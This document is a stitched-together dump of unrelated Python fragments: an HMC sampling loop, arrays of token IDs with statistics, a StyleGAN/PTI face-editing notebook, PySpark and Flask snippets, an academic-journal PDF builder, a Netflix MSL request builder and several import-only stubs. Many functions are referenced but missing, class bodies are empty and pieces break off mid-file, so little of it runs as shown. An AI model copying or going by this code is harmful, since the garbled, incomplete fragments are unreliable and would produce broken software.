hmckernel = PyHMC_fourier(py_log_prob, py_grad_log_prob, invmetric_diag=kwts)
epsadapt = DualAveragingStepSize(args.eps)
stepsize = args.eps
samples, pyacc = [], []
for i in range(args.nsamples):
print(i)
lpsteps = np.random.randint(lpsteps1, lpsteps2, 1)[0]
q, _, acc, energy, _ = hmckernel.hmc_step(q, lpsteps, stepsize)
prob = np.exp(energy[0] - energy[1])
if acc == 1: print('Accept in device %d with %0.2f'%(device, prob), energy)
else: print('Reject in device %d with %0.2f'%(device, prob), energy)
if i < tadapt:
if np.isnan(prob): prob = 0.
if prob > 1: prob = 1.
stepsize, avgstepsize = epsadapt.update(prob)
print("stepsize and avg : ", stepsize, avgstepsize)
elif i == tadapt:
_, stepsize = epsadapt.update(prob)
print("Step size fixed to : ", stepsize)
np.save(fpath + '/stepsizes%d-%02d'%(device, rank), stepsize)
#append
pyacc.append(acc)
if (i%thinning) == 0:
samples.append(q.astype(np.float32))
print("Finished iteration %d on device %d, rank %d in %0.2f minutes"%(i, device, rank, (time.time()-start)/60.))
print("Acceptance in device %d, rank %d = "%(device, rank), list(zip(np.unique(pyacc), np.unique(pyacc, return_counts=True)[1]/len(pyacc))))
np.save(fpath + '/samples%d-%02d'%(device, rank), np.array(samples))
np.save(fpath + '/accepts%d-%02d'%(device, rank), np.array(pyacc))
fig = callback_sampling([evolve.z_to_lin(i) for i in samples[-10:]], ic, bs)
plt.savefig(fpath + '/figs/iter%02d-%05d'%(device, i))
##########
samples = np.array(samples)
np.save(fpath + '/samples%d-%02d'%(device, rank), np.array(samples))
np.save(fpath + '/accepts%d-%02d'%(device, rank), np.array(pyacc))
end = time.time()
print('Time taken in rank %d= '%rank, end-start)
| [
11748,
299,
32152,
355,
45941,
198,
11748,
2603,
29487,
8019,
198,
6759,
29487,
8019,
13,
1904,
10786,
46384,
11537,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
11250,... | 2.255005 | 4,396 |
from asynctest import mock as async_mock, TestCase as AsyncTestCase
from ......messaging.request_context import RequestContext
from ......messaging.responder import MockResponder
from ......transport.inbound.receipt import MessageReceipt
from ...messages.cred_problem_report import V20CredProblemReport, ProblemReportReason
from .. import cred_problem_report_handler as test_module
| [
6738,
355,
2047,
310,
395,
1330,
15290,
355,
30351,
62,
76,
735,
11,
6208,
20448,
355,
1081,
13361,
14402,
20448,
198,
198,
6738,
47082,
37348,
3039,
13,
25927,
62,
22866,
1330,
19390,
21947,
198,
6738,
47082,
37348,
3039,
13,
5546,
263... | 3.747573 | 103 |
from .lmcut import tokenize
| [
6738,
764,
75,
76,
8968,
1330,
11241,
1096,
198
] | 3.111111 | 9 |
#!/usr/bin/env python
# coding: utf-8
# PyDrive activation Used for bypassing Google Drive download rate limit
# In[ ]:
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
from google.colab import auth
from oauth2client.client import GoogleCredentials
download_with_pydrive = True #@param {type:"boolean"}
downloader = Downloader(download_with_pydrive)
# ## Step 1 - Install Packages required by PTI
# In[ ]:
## Other packages are already builtin in the Colab interpreter
get_ipython().system('pip install wandb')
get_ipython().system('pip install lpips')
## Used for faster inference of StyleGAN by enabling C++ code compilation
get_ipython().system('wget https://github.com/ninja-build/ninja/releases/download/v1.8.2/ninja-linux.zip')
get_ipython().system('sudo unzip ninja-linux.zip -d /usr/local/bin/')
get_ipython().system('sudo update-alternatives --install /usr/bin/ninja ninja /usr/local/bin/ninja 1 --force')
# ## Step 2 - Download Pretrained models
# In[2]:
import os
os.chdir('//home/jp/Documents/gitWorkspace/')
CODE_DIR = 'PTI'
# In[ ]:
get_ipython().system('git clone https://github.com/danielroich/PTI.git $CODE_DIR')
# In[3]:
os.chdir(f'./{CODE_DIR}')
# In[4]:
import os
import sys
import pickle
import numpy as np
from PIL import Image
import torch
from configs import paths_config, hyperparameters, global_config
from utils.align_data import pre_process_images
from scripts.run_pti import run_PTI
from IPython.display import display
import matplotlib.pyplot as plt
from scripts.latent_editor_wrapper import LatentEditorWrapper
# In[ ]:
current_directory = os.getcwd()
save_path = os.path.join(os.path.dirname(current_directory), CODE_DIR, "pretrained_models")
os.makedirs(save_path, exist_ok=True)
# In[ ]:
## Download pretrained StyleGAN on FFHQ 1024x1024
downloader.download_file("125OG7SMkXI-Kf2aqiwLLHyCvSW-gZk3M", os.path.join(save_path, 'ffhq.pkl'))
# In[ ]:
## Download Dlib tool for alingment, used for preprocessing images before PTI
downloader.download_file("1xPmn19T6Bdd-_RfCVlgNBbfYoh1muYxR", os.path.join(save_path, 'align.dat'))
# ## Step 3 - Configuration Setup
# In[ ]:
image_dir_name = 'image'
## If set to true download desired image from given url. If set to False, assumes you have uploaded personal image to
## 'image_original' dir
use_image_online = True
image_name = 'personal_image'
use_multi_id_training = False
global_config.device = 'cuda'
paths_config.e4e = '/home/jp/Documents/gitWorkspace/PTI/pretrained_models/e4e_ffhq_encode.pt'
paths_config.input_data_id = image_dir_name
paths_config.input_data_path = f'/home/jp/Documents/gitWorkspace/PTI/{image_dir_name}_processed'
paths_config.stylegan2_ada_ffhq = '/home/jp/Documents/gitWorkspace/PTI/pretrained_models/ffhq.pkl'
paths_config.checkpoints_dir = '/home/jp/Documents/gitWorkspace/PTI/'
paths_config.style_clip_pretrained_mappers = '/home/jp/Documents/gitWorkspace/PTI/pretrained_models'
hyperparameters.use_locality_regularization = False
# ## Step 4 - Preproccess Data
# In[ ]:
os.makedirs(f'./{image_dir_name}_original', exist_ok=True)
os.makedirs(f'./{image_dir_name}_processed', exist_ok=True)
os.chdir(f'./{image_dir_name}_original')
# In[ ]:
## Download real face image
## If you want to use your own image skip this part and upload an image/images of your choosing to image_original dir
if use_image_online:
get_ipython().system('wget -O personal_image.jpg https://static01.nyt.com/images/2019/09/09/opinion/09Hunter1/09Hunter1-superJumbo.jpg ## Photo of Sarena Wiliams')
# In[ ]:
original_image = Image.open(f'{image_name}.jpg')
original_image
# In[ ]:
os.chdir('/home/jp/Documents/gitWorkspace/PTI')
# In[ ]:
pre_process_images(f'/home/jp/Documents/gitWorkspace/PTI/{image_dir_name}_original')
# In[ ]:
aligned_image = Image.open(f'/home/jp/Documents/gitWorkspace/PTI/{image_dir_name}_processed/{image_name}.jpeg')
aligned_image.resize((512,512))
# ## Step 5 - Invert images using PTI
# In order to run PTI and use StyleGAN2-ada, the cwd should the parent of 'torch_utils' and 'dnnlib'.
#
# In case use_multi_id_training is set to True and many images are inverted simultaneously
# activating the regularization to keep the *W* Space intact is recommended.
#
# If indeed the regularization is activated then please increase the number of pti steps from 350 to 450 at least
# using hyperparameters.max_pti_steps
# In[ ]:
os.chdir('/home/jp/Documents/gitWorkspace/PTI')
model_id = run_PTI(use_wandb=False, use_multi_id_training=use_multi_id_training)
# ## Visualize results
# In[ ]:
# In[ ]:
# In[ ]:
generator_type = paths_config.multi_id_model_type if use_multi_id_training else image_name
old_G, new_G = load_generators(model_id, generator_type)
# In[ ]:
# If multi_id_training was used for several images.
# You can alter the w_pivot index which is currently configured to 0, and then running
# the visualization code again. Using the same generator on different latent codes.
# In[ ]:
w_path_dir = f'{paths_config.embedding_base_dir}/{paths_config.input_data_id}'
embedding_dir = f'{w_path_dir}/{paths_config.pti_results_keyword}/{image_name}'
w_pivot = torch.load(f'{embedding_dir}/0.pt')
# In[ ]:
old_image = old_G.synthesis(w_pivot, noise_mode='const', force_fp32 = True)
new_image = new_G.synthesis(w_pivot, noise_mode='const', force_fp32 = True)
# In[ ]:
print('Upper image is the inversion before Pivotal Tuning and the lower image is the product of pivotal tuning')
plot_syn_images([old_image, new_image])
# ## InterfaceGAN edits
# In[ ]:
latent_editor = LatentEditorWrapper()
latents_after_edit = latent_editor.get_single_interface_gan_edits(w_pivot, [-2, 2])
# In order to get different edits. Such as younger face or make the face smile more. Please change the factors passed to "get_single_interface_gan_edits".
# Currently the factors are [-2,2]. You can pass for example: range(-3,3)
# In[ ]:
for direction, factor_and_edit in latents_after_edit.items():
print(f'Showing {direction} change')
for latent in factor_and_edit.values():
old_image = old_G.synthesis(latent, noise_mode='const', force_fp32 = True)
new_image = new_G.synthesis(latent, noise_mode='const', force_fp32 = True)
plot_syn_images([old_image, new_image])
# ## StyleCLIP editing
# ### Download pretrained models
# In[ ]:
mappers_base_dir = '/home/jp/Documents/gitWorkspace/PTI/pretrained_models'
# In[ ]:
# More pretrained mappers can be found at: "https://github.com/orpatashnik/StyleCLIP/blob/main/utils.py"
# Download Afro mapper
downloader.download_file("1i5vAqo4z0I-Yon3FNft_YZOq7ClWayQJ", os.path.join(mappers_base_dir, 'afro.pt'))
# In[ ]:
# Download Mohawk mapper
downloader.download_file("1oMMPc8iQZ7dhyWavZ7VNWLwzf9aX4C09", os.path.join(mappers_base_dir, 'mohawk.pt'))
# In[ ]:
# Download e4e encoder, used for the first inversion step instead on the W inversion.
downloader.download_file("1cUv_reLE6k3604or78EranS7XzuVMWeO", os.path.join(mappers_base_dir, 'e4e_ffhq_encode.pt'))
# ### Use PTI with e4e backbone for StyleCLIP
# In[ ]:
# Changing first_inv_type to W+ makes the PTI use e4e encoder instead of W inversion in the first step
hyperparameters.first_inv_type = 'w+'
os.chdir('/home/jp/Documents/gitWorkspace/PTI')
model_id = run_PTI(use_wandb=False, use_multi_id_training=use_multi_id_training)
# ### Apply edit
# In[ ]:
from scripts.pti_styleclip import styleclip_edit
# In[ ]:
paths_config.checkpoints_dir = '/home/jp/Documents/gitWorkspace/PTI'
os.chdir('/home/jp/Documents/gitWorkspace/PTI')
styleclip_edit(use_multi_id_G=use_multi_id_training, run_id=model_id, edit_types = ['afro'], use_wandb=False)
styleclip_edit(use_multi_id_G=use_multi_id_training, run_id=model_id, edit_types = ['mohawk'], use_wandb=False)
# In[ ]:
original_styleCLIP_path = f'/home/jp/Documents/gitWorkspace/PTI/StyleCLIP_results/{image_dir_name}/{image_name}/e4e/{image_name}_afro.jpg'
new_styleCLIP_path = f'/home/jp/Documents/gitWorkspace/PTI/StyleCLIP_results/{image_dir_name}/{image_name}/PTI/{image_name}_afro.jpg'
original_styleCLIP = Image.open(original_styleCLIP_path).resize((256,256))
new_styleCLIP = Image.open(new_styleCLIP_path).resize((256,256))
# In[ ]:
display_alongside_source_image([original_styleCLIP, new_styleCLIP])
# In[ ]:
original_styleCLIP_path = f'/home/jp/Documents/gitWorkspace/PTI/StyleCLIP_results/{image_dir_name}/{image_name}/e4e/{image_name}_mohawk.jpg'
new_styleCLIP_path = f'/home/jp/Documents/gitWorkspace/PTI/StyleCLIP_results/{image_dir_name}/{image_name}/PTI/{image_name}_mohawk.jpg'
original_styleCLIP = Image.open(original_styleCLIP_path).resize((256,256))
new_styleCLIP = Image.open(new_styleCLIP_path).resize((256,256))
# In[ ]:
display_alongside_source_image([original_styleCLIP, new_styleCLIP])
# ## Other methods comparison
# ### Invert image using other methods
# In[ ]:
from scripts.latent_creators import e4e_latent_creator
from scripts.latent_creators import sg2_latent_creator
from scripts.latent_creators import sg2_plus_latent_creator
# In[ ]:
e4e_latent_creator = e4e_latent_creator.E4ELatentCreator()
e4e_latent_creator.create_latents()
sg2_latent_creator = sg2_latent_creator.SG2LatentCreator(projection_steps = 600)
sg2_latent_creator.create_latents()
sg2_plus_latent_creator = sg2_plus_latent_creator.SG2PlusLatentCreator(projection_steps = 1200)
sg2_plus_latent_creator.create_latents()
# In[ ]:
inversions = {}
sg2_embedding_dir = f'{w_path_dir}/{paths_config.sg2_results_keyword}/{image_name}'
inversions[paths_config.sg2_results_keyword] = torch.load(f'{sg2_embedding_dir}/0.pt')
e4e_embedding_dir = f'{w_path_dir}/{paths_config.e4e_results_keyword}/{image_name}'
inversions[paths_config.e4e_results_keyword] = torch.load(f'{e4e_embedding_dir}/0.pt')
sg2_plus_embedding_dir = f'{w_path_dir}/{paths_config.sg2_plus_results_keyword}/{image_name}'
inversions[paths_config.sg2_plus_results_keyword] = torch.load(f'{sg2_plus_embedding_dir}/0.pt')
# In[ ]:
# In[ ]:
# In[ ]:
for inv_type, latent in inversions.items():
print(f'Displaying {inv_type} inversion')
plot_image_from_w(latent, old_G)
print(f'Displaying PTI inversion')
plot_image_from_w(w_pivot, new_G)
# In[ ]:
# In[ ]:
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
2,
9485,
24825,
14916,
16718,
329,
17286,
278,
3012,
9974,
4321,
2494,
4179,
198,
198,
2,
554,
58,
2361,
25,
628,
198,
6738,
279,
5173,
11... | 2.645228 | 3,887 |
import pyspark
from pyspark import SparkConf
from pyspark.sql import SparkSession
spark = SparkSession \
.builder \
.appName("Our first Python Spark SQL example") \
.getOrCreate()
spark.sparkContext.getConf().getAll()
spark
path = "./data/sparkify_log_small.json"
user_log = spark.read.json(path)
user_log.printSchema()
user_log.describe()
user_log.show(n=1)
user_log.take(5)
out_path = "data/sparkify_log_small.csv"
user_log.write.save(out_path, format="csv", header=True)
user_log_2 = spark.read.csv(out_path, header=True)
user_log_2.printSchema()
user_log_2.take(2)
user_log_2.select("userID").show()
user_log_2.take(1)
| [
11748,
279,
893,
20928,
198,
6738,
279,
893,
20928,
1330,
17732,
18546,
198,
6738,
279,
893,
20928,
13,
25410,
1330,
17732,
36044,
198,
198,
2777,
668,
796,
17732,
36044,
3467,
198,
220,
220,
220,
764,
38272,
3467,
198,
220,
220,
220,
... | 2.478764 | 259 |
from django.forms import ModelForm
from .models import Comment, Reply | [
6738,
42625,
14208,
13,
23914,
1330,
9104,
8479,
198,
6738,
764,
27530,
1330,
18957,
11,
14883
] | 4.3125 | 16 |
#! /usr/bin/env python
from flask.ext.script import Manager
from flask.ext.script.commands import ShowUrls, Clean
from <%= appName %> import create_app<% if (databaseMapper === 'sqlalchemy') { -%>, db<% } %>
app = create_app("development")
manager = Manager(app)
manager.add_command("show-urls", ShowUrls())
manager.add_command("clean", Clean())
@manager.shell
def make_shell_context():
""" Creates a python REPL with several default imports
in the context of the app
"""
return dict(app=app<% if (databaseMapper === 'sqlalchemy') { -%>, db=db<% } %>)
<% if (databaseMapper === 'sqlalchemy') { -%>
@manager.command
def createdb():
""" Creates a database with all of the tables defined in
your SQLAlchemy models
"""
db.create_all()
<% } -%>
@manager.command
def test():
""" flake8 and run all your tests using py.test
"""
import pytest
pytest.main("--cov=<%= appName %> --mccabe --flakes tests")
if __name__ == '__main__':
manager.run()
| [
2,
0,
1220,
14629,
14,
8800,
14,
24330,
21015,
198,
6738,
42903,
13,
2302,
13,
12048,
1330,
9142,
198,
6738,
42903,
13,
2302,
13,
12048,
13,
9503,
1746,
1330,
5438,
16692,
7278,
11,
5985,
198,
198,
6738,
1279,
4,
28,
598,
5376,
4064... | 2.749319 | 367 |
import numpy as np
from sklearn.utils.validation import check_X_y, check_is_fitted
| [
11748,
299,
32152,
355,
45941,
198,
6738,
1341,
35720,
13,
26791,
13,
12102,
341,
1330,
2198,
62,
55,
62,
88,
11,
2198,
62,
271,
62,
38631,
628
] | 3.111111 | 27 |
from django.urls import path
from . import views
app_name = 'network'
urlpatterns = [
path('', views.Index.as_view(), name='index'),
path('create-subscriber/', views.CreateSubscriber.as_view(), name='create-subscriber'),
]
| [
6738,
42625,
14208,
13,
6371,
82,
1330,
3108,
198,
6738,
764,
1330,
5009,
198,
198,
1324,
62,
3672,
796,
705,
27349,
6,
198,
198,
6371,
33279,
82,
796,
685,
198,
220,
220,
220,
3108,
10786,
3256,
5009,
13,
15732,
13,
292,
62,
1177,
... | 2.807229 | 83 |
"""PDF utilities
"""
import collections
import fpdf
import os
import pathlib
import PyPDF2 as pypdf
import tempfile
import time
import typing
import apsjournals
ArticleMeta = collections.namedtuple('ArticleMeta', 'article file pages')
LinkMeta = collections.namedtuple('LinkMeta', 'source_page target_page x y w h')
BookmarkMeta = collections.namedtuple('BookmarkMeta', 'name page parent')
def clean_path(path: str):
"""Clean path for pdf article"""
return path.replace(',', '')
def get_issue_meta(issue, dir: str, throttle: int=2) -> typing.List[ArticleMeta]:
"""Download Issue contents and return meta data about where the articles
have been download.
Args:
issue:
Issue, the issue whose articles to download
dir:
str, the directory name
throttle:
int, the number of seconds between downloads, used to
Returns:
"""
if not os.path.exists(dir):
os.mkdir(dir)
meta = []
for article in issue.articles:
time.sleep(throttle)
path = os.path.join(dir, clean_path(article.name)) + '.pdf'
article.pdf(path)
with open(path, 'rb') as fid:
meta.append(ArticleMeta(article, path, pypdf.PdfFileReader(fid).getNumPages()))
return meta
class ApsPDF(fpdf.FPDF):
"""Create a PDF of all issue contents with Table of Contents"""
####################### META DATA CURATION #######################
####################### OVERRIDDEN METHODS #######################
####################### ADDITIONAL PAGES #######################
def add_page_cover(self):
"""Add cover page"""
self.add_page()
self.cell(0, 50, '', ln=1) # padding
self.set_font_size(20)
self.cell(0, 10, self._meta_issue.vol.journal.name, align='C', ln=1)
self.cell(0, 10, "Volume {:d} Issue {:d}".format(self._meta_issue.vol.num, self._meta_issue.num), align='C', ln=1)
# self.cell(0, 170, '', ln=1) # padding
def add_page_contents(self, meta_cache):
"""Add Table of Contents"""
self.add_page()
max_authors = 10
line_items = list(self._meta_issue.contents(True))
contents_pages = len(line_items) * 10 // 208 + 1 + 1
page = contents_pages + 1
for level, member in line_items:
if member.__class__.__name__ == 'Section': # figure out dependency issue here
self.set_font('Arial', style='', size=16 - 2 * level)
self.cell(0, 10, txt=member.name, ln=1)
else: # Article
meta = meta_cache[member.name]
indent = 10 * ' '
# Create link
link = LinkMeta(self.page_no() - 1, page, None, None, None, None)
# add article title
self.set_font('Arial', style='I', size=10)
self.cell(50, 7, txt=indent + member.name, ln=0, meta_link=link)
# add page number at end of title line
self.set_font('Arial', style='', size=10)
self.cell(0, 7, txt=str(page + contents_pages), ln=1, align='R')
# add author line
self.set_font('Arial', style='', size=8)
author_text = 2 * indent + ', '.join(a.last_name for a in member.authors[:max_authors]) + (' et. al.' if len(member.authors) > max_authors else '')
self.cell(10, 2, txt=author_text, ln=1, meta_link=link) # author name
self.cell(10, 4, txt='', ln=1) # padding below author name
page = page + meta.pages
####################### META INFO BUILDERS #######################
def add_bookmarks(self):
"""Add bookmarks to document"""
with open(self._meta_out_file, 'wb') as out_fid:
with open(self._meta_pre_path, 'rb') as pre_fid:
reader = pypdf.PdfFileReader(pre_fid)
writer = pypdf.PdfFileWriter()
page_bookmarks = {b.page: [] for b in self._meta_bookmarks} # TODO refactor for defaultdict
for b in self._meta_bookmarks:
page_bookmarks[b.page].append(b)
bookmark_cache = {}
page_links = {l.target_page: l for l in self._meta_links}
for n in range(reader.getNumPages()):
writer.addPage(reader.getPage(pageNumber=n))
if n == 1:
writer.addBookmark('Cover', 0)
elif n == 2:
writer.addBookmark('Contents', 1)
elif n in page_bookmarks:
for bookmark in page_bookmarks[n]:
bookmark_handle = writer.addBookmark(bookmark.name, bookmark.page, parent=bookmark_cache.get(bookmark.parent, None))
bookmark_cache[bookmark] = bookmark_handle
# if n in page_links: # TODO resolve the mismatched placement of the links
# link = page_links[n]
# print('Adding Link: ({:d}, {:d}, {:d}, {:d}) {:d} -> {:d}'.format(link.h, link.w, link.x, link.y, link.source_page, link.target_page))
# writer.addLink(link.source_page, link.target_page, rect=(link.x, link.y, link.w, link.h))
writer.write(out_fid)
def cleanup(self):
"""Remove the temp file"""
os.remove(self._meta_pre_path)
####################### PRIMARY INTERFACE BUILD #######################
def build(self):
"""Build the pdf"""
with tempfile.TemporaryDirectory('.aps-tmp') as tmp:
# Build issue
metas = get_issue_meta(self._meta_issue, str(tmp))
meta_cache = {m.article.name: m for m in metas}
# output cover pages
self.add_page_cover()
self.add_page_contents(meta_cache)
self.output(os.path.join(str(tmp), 'cover.pdf'))
# Get overall writer
writer = pypdf.PdfFileWriter()
# Write out fully assembled file
with open(self._meta_pre_path, 'wb') as out_fid:
# writer.write(fid)
# Establish cover pages
with open(os.path.join(str(tmp), 'cover.pdf'), 'rb') as fid:
cover_reader = pypdf.PdfFileReader(fid)
page = cover_reader.getNumPages()
writer.appendPagesFromReader(cover_reader, after_page_append=0)
writer.write(out_fid)
# Walk through individual article pdfs and add each to the overall PDF
parents = {1: None}
for level, item in self._meta_issue.contents(include_level=True):
if item.__class__.__name__ == 'Section':
parents[level + 1] = self._meta_bookmark(item.name, page, parent=parents.get(level, None))
else: # Article
meta = meta_cache[item.name]
with open(meta.file, 'rb') as fid:
reader = pypdf.PdfFileReader(fid)
writer.appendPagesFromReader(reader, after_page_append=page)
writer.write(out_fid)
self._meta_bookmark(meta.article.name, page, parent=parents[level])
page += meta.pages
# writer.write(out_fid)
self.add_bookmarks()
self.cleanup()
| [
37811,
20456,
20081,
198,
37811,
628,
198,
11748,
17268,
198,
11748,
277,
12315,
198,
11748,
28686,
198,
11748,
3108,
8019,
198,
11748,
9485,
20456,
17,
355,
279,
4464,
7568,
198,
11748,
20218,
7753,
198,
11748,
640,
198,
11748,
19720,
19... | 2.088186 | 3,606 |
# -*- coding: utf-8 -*-
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Optional
from synapse.api.constants import LimitBlockingTypes, UserTypes
from synapse.api.errors import Codes, ResourceLimitError
from synapse.config.server import is_threepid_reserved
from synapse.types import Requester
logger = logging.getLogger(__name__)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
15069,
12131,
383,
24936,
13,
2398,
5693,
327,
13,
40,
13,
34,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
... | 3.606299 | 254 |
# -*- coding: utf-8 -*-
"""
Copyright (C) 2017 Sebastian Golasch (plugin.video.netflix)
Copyright (C) 2018 Caphm (original implementation module)
MSL request building
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
from __future__ import absolute_import, division, unicode_literals
import json
import base64
import random
import subprocess
import time
from resources.lib.globals import g
import resources.lib.common as common
# check if we are on Android
try:
SDKVERSION = int(subprocess.check_output(
['/system/bin/getprop', 'ro.build.version.sdk']))
except (OSError, subprocess.CalledProcessError):
SDKVERSION = 0
if SDKVERSION >= 18:
from .android_crypto import AndroidMSLCrypto as MSLCrypto
else:
from .default_crypto import DefaultMSLCrypto as MSLCrypto
class MSLRequestBuilder(object):
"""Provides mechanisms to create MSL requests"""
@common.time_execution(immediate=True)
def msl_request(self, data, esn):
"""Create an encrypted MSL request"""
return (json.dumps(self._signed_header(esn)) +
json.dumps(self._encrypted_chunk(data, esn)))
@common.time_execution(immediate=True)
def handshake_request(self, esn):
"""Create a key handshake request"""
header = json.dumps({
'entityauthdata': {
'scheme': 'NONE',
'authdata': {'identity': esn}},
'headerdata':
base64.standard_b64encode(
self._headerdata(is_handshake=True).encode('utf-8')).decode('utf-8'),
'signature': ''
}, sort_keys=True)
payload = json.dumps(self._encrypted_chunk(envelope_payload=False))
return header + payload
@common.time_execution(immediate=True)
def _headerdata(self, esn=None, compression=None, is_handshake=False):
"""
Function that generates a MSL header dict
:return: The base64 encoded JSON String of the header
"""
self.current_message_id = self.rndm.randint(0, pow(2, 52))
header_data = {
'messageid': self.current_message_id,
'renewable': True,
'capabilities': {
'languages': [g.LOCAL_DB.get_value('locale_id')],
'compressionalgos': [compression] if compression else [] # GZIP, LZW, Empty
}
}
if is_handshake:
header_data['keyrequestdata'] = self.crypto.key_request_data()
else:
header_data['sender'] = esn
_add_auth_info(header_data, self.user_id_token)
return json.dumps(header_data)
@common.time_execution(immediate=True)
def decrypt_header_data(self, data, enveloped=True):
"""Decrypt a message header"""
header_data = json.loads(base64.standard_b64decode(data))
if enveloped:
init_vector = base64.standard_b64decode(header_data['iv'])
cipher_text = base64.standard_b64decode(header_data['ciphertext'])
return json.loads(self.crypto.decrypt(init_vector, cipher_text))
return header_data
def _add_auth_info(header_data, user_id_token):
"""User authentication identifies the application user associated with a message"""
if user_id_token and _is_useridtoken_valid(user_id_token):
# Authentication with user ID token containing the user identity
header_data['useridtoken'] = user_id_token
else:
# Authentication with the user credentials
credentials = common.get_credentials()
header_data['userauthdata'] = {
'scheme': 'EMAIL_PASSWORD',
'authdata': {
'email': credentials['email'],
'password': credentials['password']
}
}
def _is_useridtoken_valid(user_id_token):
"""Check if user id token is not expired"""
token_data = json.loads(base64.standard_b64decode(user_id_token['tokendata']))
return token_data['expiration'] > time.time()
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
220,
220,
220,
15069,
357,
34,
8,
2177,
26190,
402,
12456,
354,
357,
33803,
13,
15588,
13,
36977,
8,
198,
220,
220,
220,
15069,
357,
34,
8,
2864,
4476,
2... | 2.375811 | 1,695 |
# from https://github.com/jupyterhub/mybinder.org-deploy/blob/master/appendix/extra_notebook_config.py
import os
# if a user leaves a notebook with a running kernel,
# the effective idle timeout will typically be CULL_TIMEOUT + CULL_KERNEL_TIMEOUT
# as culling the kernel will register activity,
# resetting the no_activity timer for the server as a whole
if os.getenv('CULL_TIMEOUT'):
# shutdown the server after no activity
c.NotebookApp.shutdown_no_activity_timeout = int(os.getenv('CULL_TIMEOUT'))
if os.getenv('CULL_KERNEL_TIMEOUT'):
# shutdown kernels after no activity
c.MappingKernelManager.cull_idle_timeout = int(
os.getenv('CULL_KERNEL_TIMEOUT'))
if os.getenv('CULL_INTERVAL'):
# check for idle kernels this often
c.MappingKernelManager.cull_interval = int(os.getenv('CULL_INTERVAL'))
# a kernel with open connections but no activity still counts as idle
# this is what allows us to shutdown servers when people leave a notebook open and wander off
if os.getenv('CULL_CONNECTED') not in {'', '0'}:
c.MappingKernelManager.cull_connected = True
# Change default log format
c.Application.log_format = "%(color)s[%(levelname)s %(asctime)s.%(msecs).03d %(name)s %(module)s:%(lineno)d]%(end_color)s %(message)s"
if c.Application.log_level != 'DEBUG':
c.Application.log_level = 'WARN'
| [
2,
422,
3740,
1378,
12567,
13,
785,
14,
73,
929,
88,
353,
40140,
14,
1820,
65,
5540,
13,
2398,
12,
2934,
1420,
14,
2436,
672,
14,
9866,
14,
1324,
19573,
14,
26086,
62,
11295,
2070,
62,
11250,
13,
9078,
198,
11748,
28686,
198,
2,
... | 2.802521 | 476 |
# -*- coding: utf-8 -*-
""" 东方财富网:个股详情爬虫 """
import re
import scrapy
import json
import time
from crawl import db
from crawl import helper
from crawl.models.Stock import Stock
from crawl.models.StockDetail import StockDetail
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
220,
10310,
250,
43095,
164,
112,
95,
43380,
234,
163,
121,
239,
171,
120,
248,
10310,
103,
164,
224,
94,
46237,
99,
46349,
227,
163,
230,
105,
164,
247,
... | 2.414894 | 94 |
import torch
x = torch.randn(10, 5)
print(x)
labels = torch.LongTensor([1,2,3,3,0,0,0,0,0,0])
n_classes = x.shape[-1]
one_hot = torch.nn.functional.one_hot(labels, n_classes)
print(one_hot)
print(x * one_hot)
compare = (x * one_hot).sum(-1).unsqueeze(-1).repeat(1, n_classes)
print(compare)
compared_scores = x >= compare
print(compared_scores)
rr = 1 / compared_scores.float().sum(-1)
print(rr)
mrr = rr.mean()
print(mrr) | [
11748,
28034,
198,
198,
87,
796,
28034,
13,
25192,
77,
7,
940,
11,
642,
8,
198,
198,
4798,
7,
87,
8,
198,
198,
23912,
1424,
796,
28034,
13,
14617,
51,
22854,
26933,
16,
11,
17,
11,
18,
11,
18,
11,
15,
11,
15,
11,
15,
11,
15,... | 2.16 | 200 |
import sys
import h5py
import json
import numpy as np
import matplotlib.pyplot as plt
filename = sys.argv[1]
data = h5py.File(filename,'r')
attr = json.loads(data.attrs['jsonparam'])
#for k,v in attr['config'].items():
# print(k,v)
#print()
#
#for k,v in attr['param'].items():
# print(k,v)
#
#print()
#print()
#print()
cal_data = attr['cal_data']
arena_contour = np.array(cal_data['position']['contour'])
x_arena = arena_contour[:,0,0]
y_arena = arena_contour[:,0,1]
t_total = np.array(data['t_total'])
t_trial = np.array(data['t_trial'])
body_angle = np.array(data['body_angle'])
# Put angle in range (0,pi)
mask = body_angle < 0.0
body_angle[mask] = body_angle[mask] + np.pi
# Extract fly position
pos = np.array(data['position'])
x = pos[:,0]
y = pos[:,1]
plt.figure(1)
plt.plot(t_total, np.rad2deg(body_angle),'.-')
plt.xlabel('t (sec)')
plt.ylabel('angle (deg)')
plt.grid(True)
plt.figure(2)
plt.plot(x_arena, y_arena, 'r')
plt.plot(x,y)
plt.xlabel('x (pix)')
plt.ylabel('y (pix)')
plt.grid(True)
plt.axis('equal')
plt.show()
plt.show()
| [
11748,
25064,
198,
11748,
289,
20,
9078,
198,
11748,
33918,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
198,
34345,
796,
25064,
13,
853,
85,
58,
16,
60,
198,
7890,
796,
289,
... | 2.167006 | 491 |
from typing import NoReturn
from .StoryManager import StoryManager
| [
6738,
19720,
1330,
1400,
13615,
198,
6738,
764,
11605,
13511,
1330,
8362,
13511,
628
] | 4.857143 | 14 |
import numpy as np
import pylab as pl
from peri.test import init
crbs = []
rads = np.arange(1, 10, 1./5)
rads = np.linspace(1, 10, 39)
rads = np.logspace(0, 1, 50)
